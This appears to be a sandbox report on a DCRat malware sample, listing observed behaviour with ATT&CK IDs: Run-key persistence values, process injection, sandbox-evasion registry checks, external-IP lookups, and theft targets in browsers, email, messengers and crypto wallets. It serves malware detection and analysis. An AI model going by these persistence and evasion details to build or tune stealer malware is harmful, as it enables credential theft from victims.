dcrat | bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Xobaepojedu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	keygen-step-4.exe

Loads dropped DLL 64 IoCs

pid	Process
2824	rundll32.exe
1388	Install.tmp
5832	rundll32.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5352	y1.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
1172	toolspab1.exe
4796	c7ae36fa.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5452	DDFD.exe
5452	DDFD.exe
5452	DDFD.exe
5452	DDFD.exe
5452	DDFD.exe
5452	DDFD.exe
5744	dsdtsbw
3512	tvdtsbw
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
3928	lighteningplayer-cache-gen.exe
1716	rundll32.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
5592	SunLabsPlayer.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe
3928	lighteningplayer-cache-gen.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Wyzhyvalihae.exe\""	Ultra.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	7863.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"	7863.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaoou.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg6_6asg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
84	api.ipify.org
180	api.myip.com
182	api.myip.com
35	ip-api.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\yVNCI2AkK	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\AHW8SEZO.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\AHW8SEZO.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 4897591F68D575D7	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\5HvAAEoloJAPaj	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent BDB4A04E77CD4EB0	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\vEzcjRDlMgL	svchost.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 500 set thread context of 192	500	svchost.exe	79
PID 4984 set thread context of 5496	4984	7863.tmp.exe	104
PID 4984 set thread context of 5692	4984	7863.tmp.exe	108
PID 4768 set thread context of 5804	4768	75F1.tmp.exe	110
PID 5628 set thread context of 1172	5628	toolspab1.exe	158
PID 3956 set thread context of 5280	3956	339802969.exe	211
PID 1436 set thread context of 1320	1436	1230843919.exe	212
PID 6100 set thread context of 5744	6100	dsdtsbw	213
PID 5312 set thread context of 5820	5312	dsdtsbw	249
PID 1648 set thread context of 5192	1648	dsdtsbw	261

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\Windows NT\PCNUGQHGUQ\ultramediaburner.exe.config	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\install.dll	xiuhuali.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Wyzhyvalihae.exe.config	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-4TMIJ.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\2	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.3928	lighteningplayer-cache-gen.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\vEzcjRDlMgL\cache.dat	rundll32.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files\libEGL.dll	xiuhuali.exe
File created	C:\Program Files (x86)\lighteningplayer\data_load.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4884	2192	WerFault.exe	207
3928	1468	WerFault.exe	253

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral6/files/0x000100000001ac73-333.dat	nsis_installer_2
behavioral6/files/0x000100000001ac73-334.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tvdtsbw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dsdtsbw

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	75F1.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	75F1.tmp.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5316	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4748	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4792	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	app.exe

